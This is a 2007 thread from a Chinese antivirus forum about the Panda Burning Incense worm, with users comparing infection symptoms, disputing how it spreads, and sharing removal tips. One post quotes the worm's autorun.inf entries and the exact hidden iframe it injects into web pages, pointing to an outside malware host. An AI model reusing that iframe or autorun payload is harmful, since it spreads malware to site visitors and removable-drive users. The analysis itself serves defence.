瑞星卡卡安全论坛
安全使用者 - 2007-1-18 14:25:00
哎,,可爱的熊猫,,那天我机子上中熊猫变种,具体是的电脑一启动就禁用声音,你如果一打开声音就自动加载病毒程序,禁用卡卡助手,360安全卫士及所有杀软,禁用msconfig,注册表等结束程序。。汗,,偶是电脑白痴,,看到满城尽烧国宝香,我感觉我要去成都宝光寺当和尚了。。请问病毒作者是成都的吗???带带我,我学会了好去给小日本和美国佬宣传一下中国的文化“国宝香” 我的QQ26813292
Sphoeinx - 2007-1-18 16:47:00
快弄个专杀救急啊~~~~
很菜的小菜 - 2007-1-18 16:50:00
我们单位中了,熊猫的繁殖能力真的这么强的话就不会濒临灭绝了。
杀是杀掉了,可是被破坏的文件恢复不回来,损失惨重...
保留对该病毒作者付诸法律的权力...
很菜的小菜 - 2007-1-18 17:52:00
thull - 2007-1-18 18:54:00
| 引用: |
【telnet的贴子】回复第69楼水樹雨下:“之前我在drivers目录下写了个文件,防止熊猫病毒文件的写入”网上看来的吧?之前是个放个文件防威金的……
我没有看任何这方面的文章,并不知道网上有你说的这个方法。我指的不是写代码来判断是否为熊猫病毒文件,如果是写代码的话,跟熊猫改名没什么直接联系,杀毒的方法有很多种,防毒的方法你以为就是一种么。
回复第71楼taylor05771:我是学生,是在学校机房玩的,因为时间关系,当时机房要关门了,我没去看防火墙到底怎么样,至于K不K掉我是猜测的,机房的电脑全部都是通过局域网被感染,因为重启电脑,是没有病毒的,我今天还发现局域网有两台主机对我使用的那台电脑进行漏洞攻击,名称我不记得,但我记得有RPC字眼,那些中毒的电脑不光是中熊猫,还中了sxs.exe,反正电脑都中毒了,还不如多玩下。
回复第73楼thull:我是主动运行熊猫的,你说的没错,我运行的那个熊猫是从另外一台电脑拷过来的,而那台电脑的是通过局域网被感染,熊猫自己跑进去的。
这样跟你说,我们学校机房的电脑早段时间装了瑞星杀毒,还正版的呢,照样没用,一样挂掉,他们拿U盘去拷数据,U盘全部感染,后来学校干脆把瑞星卸了,我是拿瑞星到机房去装的,你说主动运行感染,不是通过局域网扩散感染,这点没错啊,可你误解了我的意思,我是试下瑞星对这个熊猫到底有多大的能耐,如果是一般的病毒,我可以把瑞星的文件监控停了,把病毒释放出来,然后开启实时监控,再运行病毒文件,结果不用说,肯定被杀掉了,熊猫就不同了,开启瑞星又能怎么样呢,还不是照样挨K掉。
就算你说定义混淆,早段时间我用的那台电脑没有主动运行熊猫,杀毒一样挂掉,只不过时间问题罢了,有杀毒软件又怎么样呢,机子被感染了,杀毒程序还不是一样死掉。其他的我就不说了,我只是谈谈17号就是昨天的实际情况,并没有刻意说什么,我昨天玩熊猫主要有两个目的:一、看看现在的杀毒软件对熊猫烧香能有什么样的反应。二、看看熊猫除了在drivers目录下生成spoclsv.exe之外(假如spoclsv.exe文件名被禁止写入)还会不会变成另外的文件名把自己写到这个目录下。
……………… |
杀毒软件对病毒的识别有滞后性 这可能是个杀软的弊病
但是你的说法有漏洞 我的瑞星开启监控 u盘在同学的机器上(中熊猫的)那回来
在ie里面输入u盘地址 进入后瑞星直接将病毒主文件干掉(setup.exe)我电脑是显示所有文件的
u盘内有一新建文件夹 里面有hijackthis等工具 不想也被熊猫感染了 我双击文件夹 瑞星报毒 并将熊猫挨个清除 还原了原来的exe文件
我想说明一点 即使不运行那个文件瑞星都可以报毒 那么你说的有杀软也挂掉就有牵强了
我想问下你的瑞星是什么时候的
那天我给网警样本 没关监控还原到桌面的新建文件夹里 压缩时瑞星直接报毒
把监控关了后 再还原再压缩 压缩后瑞星一样可以正常开启 并无你说的那种情况
另外,我记得有个人说过 病毒也是一种程序 也需要运行才能生效 我不知道这种看法正确与否 但是 我从未看过一个exe文件放在桌面过一段时间自己运行了 大部分都是利用漏洞和双击(也包括伪造右键菜单的)等误操作中了感染的 如果你要是有样本放在硬盘上(机器没有别的毒) 什么操作也不执行 过几天这病毒自己开始从零运行感染了机器的话 请传给我下 呵呵
我也是学生 学校的机房情况和你的差不多 大部分都是因为u盘感染的 而一般人习惯双击打开 即使用右键也会可能被伪造的菜单迷惑 这两关过去了 u盘里有可执行的被感染过的文件 以为高枕无忧了 一运行 又感染了 用范伟大哥的话:防不胜防啊
所以 机房的基本是通过这种方式或者局域网共享漏洞造成的
学校的机房——————管理一般比较散漫 很少有人每天把杀软升级到最新(即使是正版) 开了自动升级也不能保证时时刻刻都是新的 这样 新的熊猫一旦是杀软识别不了的
一运行自然把杀软干掉 你说装了也没用 未免太武断了吧???
保证杀软是新的(能识别) 你不用运行熊猫 熊猫都能被干掉 如果按你的那种说法 天下所有的杀软都没办法 还不如裸奔呢
顺便问你句:你以为装了个杀软就万事大吉 防火墙是可有可无的?????????
要你的吻 - 2007-1-18 19:05:00
干脆直接做系统算了!!!
thull - 2007-1-18 19:27:00
| 引用: |
【要你的吻的贴子】干脆直接做系统算了!!!
……………… |
所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除gho文件..
感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:30,001 字节(病毒主体) 尾部添加:29 字节(标记信息)
感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
</html><iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>
在访问过的目录下生成 desktop_.ini 文件..
斑竹的帖子得看内完整啊
telnet - 2007-1-18 20:05:00
| 引用: |
| 第93楼thull:没关监控还原到桌面的新建文件夹里 压缩时瑞星直接报毒 |
直接从瑞星病毒隔离区里面还原的文件很多是不报警的,对文件点击右键,指针经过,引起触发事件(只是触发,并不是激活),只要瑞星能够识别的病毒,肯定报警。
| 引用: |
| 把监控关了后 再还原再压缩 压缩后瑞星一样可以正常开启 并无你说的那种情况 |
你把熊猫放出来不运行它,等上个两三个小时看看,会出现什么情况,再说,你把熊猫打包压起来,跟没有病毒文件有什么两样,我没见过给病毒压缩后不解压出来就可以使用的,到底你是运行解压程序还是病毒程序?这个要弄清楚。
我们学校机房的电脑(除了放毒的主机外),重启后是没有病毒的(装有还原卡),其他的我不说,我用的那台我有没有运行被感染的程序我清楚,但是一个小时这样还不是中招?你说的是没错,瑞星一样可以正常开启,我用的那台也装有啊,开始和你的一样可以开启,到了后来就不行了,这只不过是时间问题罢了。
| 引用: |
| 我想说明一点 即使不运行那个文件瑞星都可以报毒 |
说明你的瑞星可以识别。
我装的是V19.05的,虽然版本低了点,但是机房就是那么几个熊猫,有人说那个gamesetup.exe是最原始的病毒,那么也就是还没变种的对吧,这么说来,瑞星对于这个原始病毒来说应该是最新杀毒程序,但就是没反应,我那天还用了最新的江民移动版去扫描都没反应,你们不要小看移动版的,它的病毒库跟官方的病毒库查杀数据没什么两样,只不过没有实时监控,杀毒助手什么的而已,杀毒功能不会比安装版的江民差,移动版的江民还可以杀出我电脑里面瑞星最新版本所不能够检测的病毒。
| 引用: |
| 如果按你的那种说法 天下所有的杀软都没办法 还不如裸奔呢 |
现在病毒这么多,传播的方式也不同,如果只是有熊猫病毒这么一种,可能我不会装杀毒软件,瑞星更不用提了,到时候挨K掉,伤心。既然病毒多,安装杀毒软件还是可以预防很多病毒的。
| 引用: |
| 顺便问你句:你以为装了个杀软就万事大吉 防火墙是可有可无的????????? |
我不会把系统完全交给任何杀毒软件,因为我不相信它们,假如我学的不是计算机专业,我会跟许多人一样,有了杀毒软件就完全信任了,然后就是高枕无忧,我也不会关注任何什么病毒、杀毒的,同时我也不会在这里发表什么个人看法。
thull - 2007-1-18 21:24:00
回telnet:
既然你说是个时间的问题 那么这个时间是多少呢?
顺便发一下我的假设:
要是熊猫有时钟的话 那么它自己发作 这样的话它的时钟要么是倒计时 需要运行程序
要么调用系统时间 也应该是运行了才能
一个“安装文件” 不运行的话怎么有时间呢?没有时间 怎么样定自己的爆发时间呢
好象我听说过的病毒一般都是先中 到一特定的时间执行特定的事情
所以好象中过了才能有时间这个概念么
我不知道一个熊猫的setup.exe直接放到硬盘上 不对其进行任何操作
到底多长时间它开始感染呢?
PS:我不是学计算机的 对编程更是一窍不通 对病毒 更是门外汉 大家轻点拍我
而且我发现你每次回复别人的帖子都能将焦点引向别的方向 而并非是帖子原本要表达的观点 这方法参加辩论到是不错
你说的是没错,瑞星一样可以正常开启,我用的那台也装有啊,开始和你的一样可以开启,到了后来就不行了,这只不过是时间问题罢了。
呵呵 还有 我问你的防火墙问题呢 你只说了杀软 你能肯定你机器上的毒不是通过局域网漏洞感染的
还原卡?我们学校的也是还原卡 蓝光卡 但是要留个分区供储存 不是还原的 你学校机房的机器该不是所有盘一起还原的吧?
小吴天下 - 2007-1-19 0:55:00
用用超级巡警吧,杀杀熊猫和威金,这种隐藏在EXE里的病毒真不好弄。。小弟初来。向各位大虾学习!!
我恨熊猫 - 2007-1-19 0:58:00
疯了!疯了!!彻底疯了!!!
========Content========
我今天填传媒的网上报名,填完了发现电脑反应有点慢,于是重起了一下,结果就到处是熊猫了......杀毒软件全用不了!重装都不行,于是去买了个正版的瑞星可还杀不了!!?结果瑞星也瘫了!从第一页看到第七页,你们说了一大顿,我还是不懂啊!谁能用简单的方法说明"干掉熊猫的方法"啊?太专业了我听不懂啊!!(我笨啊,照顾一下,谢谢了!)
telnet - 2007-1-19 2:30:00
回thull:
我到目前为止回复了116篇文章,我几乎每一篇都是在辩论(有些是在灌水区灌水;而有些帖子是感叹,不在灌水区里,不属于灌水),你说我将焦点引向别的方向,我没这个意思,我想问下,你说我哪个帖子是将焦点引向别的方向?而且你说我每次回复别人的帖子都能将焦点引向别的方向,我觉得很奇怪,针对病毒我只是谈一些发作症状,你敢保证你能看到病毒发作后的所有症状以及查杀的所有方法?
既然你提到“还原卡?我们学校的也是还原卡 蓝光卡 但是要留个分区供储存 不是还原的 你学校机房的机器该不是所有盘一起还原的吧?”我告诉你,我们学校机房学生用的电脑全部是2000系统,系统存在四个盘(通过磁盘管理可看到):软盘、C盘、D盘、E盘,可用的一共是C、D两个盘,C盘还原,D盘有时格掉,学校网管对系统做过手脚,软盘跟E盘不会显示在操作界面上,所以看到的只是C、D两个盘,E盘设为不可用还是什么的,在地址栏那里输入E盘盘符,系统提示无法访问或者是受到限制,插移动盘进去,移动盘的盘符是E盘,而不是F盘,而且移动盘被屏蔽,在dos命令行下可看到,假设D盘存在被感染的文件,那瑞星为什么不报警,江民也没反应?
既然排除了本地盘感染的情况,就从你说的局域网漏洞感染谈下,那天我亲眼看到有两个192.168.*.*IP地址的电脑对我用的那台机进行漏洞攻击,这是瑞星漏洞攻击监控告诉我的,我已经在上面其中一篇帖子说过了,这里我就不多说了,病毒通过局域网漏洞感染了本机的文件,说来说去,还是感染文件,开着杀毒监控还是无能为力,我无话可说,这只能说病毒很强悍。对熊猫我麻木了,如果是其他的病毒会觉得很惊讶。
telnet - 2007-1-19 2:35:00
熊猫有没有时钟我不知道,我又不是熊猫的主人,如果我会制作熊猫,我还在这里混么
supermsn - 2007-1-19 9:18:00
| 引用: |
【rcf的贴子】
我装网警的防火墙规则就没中毒
……………… |
我也是用规则包,不幸中了熊猫烧香
呜呜...没救啦!
taylor05771 - 2007-1-19 10:27:00
| 引用: |
【supermsn的贴子】
我也是用规则包,不幸中了熊猫烧香
呜呜...没救啦!
……………… |
肯定是 没正确安装!
诸葛墨者 - 2007-1-19 11:14:00
可以试试我的方法:
到瑞星网站下载一个"熊猫烧香专杀工具",然后把网络断开,再打开隐藏的文件,然后搜索spoclsv.exe这个病毒文件,将其删除,再运行瑞星专杀工具即可清除该病毒了.
相思豆111 - 2007-1-19 13:35:00
这个"国宝"不怎么可爱
A0718 - 2007-1-19 14:39:00
唉
我是大胡子 - 2007-1-19 14:58:00
操!有本事去搞美、日的网站去……
宝贝噜噜 - 2007-1-19 15:07:00
我是用超级巡警查杀的,现在没有发现熊猫图标,但是,出现了文件或目录已损坏且无法读取,请运行chkdsk工具,这是什么意思?其中一个变种还会在感染目录生成desktop_.ini,运行电脑时,发现文件或目录\Program Files\Globallink\Game\Advert\1008\Desktop_.ini已损坏且无法读取.请运行Chkdsk工具.
turkey2k6 - 2007-1-19 15:14:00
各位大大,别在辩论了,如果没有从头到尾详细分析过病毒的代码,那么你看到的病毒发作现象很有可能是片面的,不完整的。真的要在这里争论的话,建议先透彻的研究下熊猫的代码再来。
如果有需要,我手头上有高手写的一篇熊猫的详细分析,从头到尾的,当然只是针对某一个变种的,不可能针对所有。文件格式为PDF,共有70页,有兴趣的话可以看看。
详细看完后,如果你的编程能力好,你也可以写出专杀来,而且你还会发现,针对熊猫,exe文件是可以免疫的,其他格式的文件或脚本文件则不能免疫。病毒会读取文件特定位置的数据,来判断此exe文件是否感染过,感染过则不再感染,我们可以人为事先修改那个特定位置的数据,让病毒误以为已经感染了。当然,这个修改的前提是不会破坏exe文件,否则就不叫免疫了,而且不通版本的病毒可能判断的位置也不一样,就说这么多了。
thull - 2007-1-19 17:15:00
我什么都不懂
也没有在这里争论的必要了
不过还是希望大家实际做过后在进行争论了
猫叔等斑斑还有各位大牛都是实际动手后才发言
有时候主观臆断解决不了任何问题
而且还会误导大家----比如某人的用cmd删所有的exe文件
……我只是说了一下自己的想法罢了
呵呵
要是让斑斑或者熊猫的作者看到争论的是这无聊的问题
要么笑死 要么气死 哈哈
先闪了 得考电磁场了 和熊猫不沾边
thull - 2007-1-19 17:27:00
【回复“telnet”的帖子】
不过我还是问下
就是一把刀子放在桌子上 它会自己起来刺你么
如果一个病毒可以不加任何外界条件自己运行的话 那么它是超自然的力量了吧
而且它自己跑进U盘,自己执行自己,那个autorun.inf文件还有什么用呢 多余了吧
呵呵
我也希望版主能对这个问题结下案吧
telnet - 2007-1-19 17:49:00
同一问题同个话题讨论的多,显得无聊,thull朋友,其实我不想跟你争论太多,说的多了,我也心烦,这个问题就讨论到此。
thull - 2007-1-19 17:58:00
你才觉得烦啊!呵呵 我早就觉得了
这个世界没有神
欢迎以后继续拍砖
telnet - 2007-1-19 18:07:00
如果不是你后来针对我而发的帖,我是不会说太多,完了就完了,但是我不补充的话,我觉得好象没有什么交代,毕竟你提了不少问题,我只好补了再补,你以为我想说很多啊。
thull - 2007-1-19 18:40:00
如果就我一个人有疑问,那是我的无知。如果大家都对你的帖子有疑问,我想,应该是你的有漏洞了吧。我就说你混淆了定义,你就开始说了,到底谁想多说,还是自己考虑下吧。
我想说一句:我们都会被耻笑……
awen31 - 2007-1-20 1:38:00
今天我的机也中了.连瑞星也没能为力,可想像它的威力了~~~~~
chinabjboy - 2007-2-1 23:08:00
请大家注意:
烧香的作者真是一个奇才,虽然我的电脑也是被烧了一下,但是我觉得这是一个技术,请那些电脑水平很低的人不要骂作者,虽然原子弹能杀人,但是有很多的国家在研究,大家只有撑握电脑技术,就不怕怎么搞,不要因为你的技术差就骂人啊
© 2000 - 2024 Rising Corp. Ltd.
